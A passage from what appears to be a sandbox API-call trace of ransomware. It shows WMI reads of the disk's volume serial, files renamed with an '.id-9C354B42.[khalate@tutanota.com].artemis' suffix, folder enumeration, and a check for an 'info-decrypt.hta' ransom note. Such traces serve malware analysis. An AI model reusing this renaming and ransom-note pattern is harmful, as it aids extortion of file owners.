puBuffLength=0x6bcecf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.671] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcebd4 | out: ppv=0x6bcebd4*=0x6737108) returned 0x0 [0203.671] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737108, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bcec68 | out: ppNamespace=0x6bcec68*=0x674815c) returned 0x0 [0204.660] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb04 | out: ppvObject=0x6bceb04*=0x7819f4) returned 0x0 [0204.660] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7819f4, pProxy=0x674815c, pAuthnSvc=0x6bceb54, pAuthzSvc=0x6bceb50, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c, pImpLevel=0x6bceb3c, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44 | out: pAuthnSvc=0x6bceb54*=0xa, pAuthzSvc=0x6bceb50*=0x0, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c*=0x6, pImpLevel=0x6bceb3c*=0x2, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44*=0x1) returned 0x0 [0204.660] WbemLocator:IUnknown:Release (This=0x7819f4) returned 0x1 [0204.660] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf8 | out: ppvObject=0x6bceaf8*=0x781a14) returned 0x0 [0204.660] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf4 | out: ppvObject=0x6bceaf4*=0x7819f4) returned 0x0 [0204.660] WbemLocator:IClientSecurity:SetBlanket (This=0x7819f4, pProxy=0x674815c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0204.661] WbemLocator:IUnknown:Release (This=0x7819f4) returned 0x2 [0204.661] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x1 [0204.661] CoTaskMemFree (pv=0x77e0b8) [0204.661] WbemLocator:IUnknown:Release (This=0x6737108) returned 0x0 [0204.661] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce6f4 | out: ppvObject=0x6bce6f4*=0x781a14) returned 0x0 [0204.661] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce6b0 | out: ppvObject=0x6bce6b0*=0x0) returned 0x80004002 [0204.666] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce4cc | out: ppvObject=0x6bce4cc*=0x0) returned 0x80004002 [0204.668] WbemLocator:IUnknown:AddRef (This=0x781a14) returned 0x3 [0204.668] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce00c | out: ppvObject=0x6bce00c*=0x0) returned 0x80004002 [0204.684] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdfbc | out: ppvObject=0x6bcdfbc*=0x0) returned 0x80004002 [0204.685] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdfc8 | out: ppvObject=0x6bcdfc8*=0x781974) returned 0x0 [0204.685] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781974, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdfd0 | out: pCid=0x6bcdfd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.685] WbemLocator:IUnknown:Release (This=0x781974) returned 0x3 [0204.685] CoGetContextToken (in: pToken=0x6bce028 | out: pToken=0x6bce028) returned 0x0 [0204.686] CoGetContextToken (in: pToken=0x6bce430 | out: pToken=0x6bce430) returned 0x0 [0204.686] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4c0 | out: ppvObject=0x6bce4c0*=0x7819fc) returned 0x0 [0204.686] WbemLocator:IRpcOptions:Query (in: This=0x7819fc, pPrx=0x781a14, dwProperty=2, pdwValue=0x6bce4e8 | out: pdwValue=0x6bce4e8) returned 0x80004002 [0204.686] WbemLocator:IUnknown:Release (This=0x7819fc) returned 0x3 [0204.686] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x2 [0204.686] CoGetContextToken (in: pToken=0x6bcea08 | out: pToken=0x6bcea08) returned 0x0 [0204.686] CoGetContextToken (in: pToken=0x6bce968 | out: pToken=0x6bce968) returned 0x0 [0204.686] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x6bcea38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcea34 | out: ppvObject=0x6bcea34*=0x674815c) returned 0x0 [0204.686] WbemLocator:IUnknown:AddRef (This=0x674815c) returned 0x4 [0204.686] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x3 [0204.686] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x2 [0204.686] SysStringLen (param_1=0x0) returned 0x0 [0204.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6bcedcc | out: puCount=0x6bcedcc*=0x0) returned 0x0 [0204.686] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6bcedc8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedc8*=0x20, pszText=0x0) returned 0x0 [0204.686] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6bcedc8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedc8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.686] CoGetContextToken (in: pToken=0x6bcea38 | out: pToken=0x6bcea38) returned 0x0 [0204.687] WbemLocator:IUnknown:AddRef (This=0x781a14) returned 0x3 [0204.687] WbemLocator:IUnknown:QueryInterface (in: This=0x781a14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce8cc | out: ppvObject=0x6bce8cc*=0x781a14) returned 0x0 [0204.687] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x3 [0204.687] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x2 [0204.687] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6bcedd0*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd0*=0x20, pszText=0x0) returned 0x0 [0204.687] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6bcedd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.687] IWbemServices:GetObject (in: This=0x674815c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bced84*=0x0, ppCallResult=0x0 | out: ppObject=0x6bced84*=0x673bf90, ppCallResult=0x0) returned 0x0 [0209.767] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x6bced84 | out: puCount=0x6bced84*=0x2) returned 0x0 [0209.767] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6bced80*=0x0, pszText=0x0 | out: puBuffLength=0x6bced80*=0xf, pszText=0x0) returned 0x0 [0209.767] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6bced80*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced80*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.768] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bced80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3502c04*=0, plFlavor=0x3502c08*=0 | out: pVal=0x6bced80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3502c04*=8, plFlavor=0x3502c08*=0) returned 0x0 [0209.768] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.768] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.768] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bced88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3502c04*=8, plFlavor=0x3502c08*=0 | out: pVal=0x6bced88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3502c04*=8, plFlavor=0x3502c08*=0) returned 0x0 [0209.768] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.768] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6bce988, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0209.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bce988, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x69 [0209.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcede8) returned 1 [0209.768] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), fInfoLevelId=0x0, lpFileInformation=0x6bcee64 | out: lpFileInformation=0x6bcee64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x20e801c0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x99dc0)) returned 1 [0209.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcede4) returned 1 [0209.769] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0209.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef6c) returned 1 [0209.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", nBufferLength=0x105, lpBuffer=0x6bcea74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0209.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", nBufferLength=0x105, lpBuffer=0x6bcea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpFilePart=0x0) returned 0x38 [0209.770] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x6bcec94 | out: lpFindFileData=0x6bcec94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b230 [0209.770] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.771] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0209.771] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0209.771] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0209.771] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0209.771] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0209.772] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0209.772] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0209.772] FindClose (in: hFindFile=0x77b230 | out: hFindFile=0x77b230) returned 1 [0209.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef2c) returned 1 [0209.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef38) returned 1 [0209.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef6c) returned 1 [0209.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", nBufferLength=0x105, lpBuffer=0x6bcea74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0209.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", nBufferLength=0x105, lpBuffer=0x6bcea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpFilePart=0x0) returned 0x38 [0209.772] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x6bcec94 | out: lpFindFileData=0x6bcec94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b230 [0209.773] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.773] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0209.773] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0209.773] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0209.773] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0209.774] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0209.774] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0209.774] FindNextFileW (in: hFindFile=0x77b230, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0 [0209.774] FindClose (in: hFindFile=0x77b230 | out: hFindFile=0x77b230) returned 1 [0209.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef2c) returned 1 [0209.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef38) returned 1 [0209.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFilePart=0x0) returned 0x44 [0209.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", nBufferLength=0x105, lpBuffer=0x6bcea24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFilePart=0x0) returned 0x44 [0209.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", lpFilePart=0x0) returned 0x48 [0209.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee8c) returned 1 [0209.775] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcef08 | out: lpFileInformation=0x6bcef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0209.775] SetThreadErrorMode (dwNewMode=0x0, 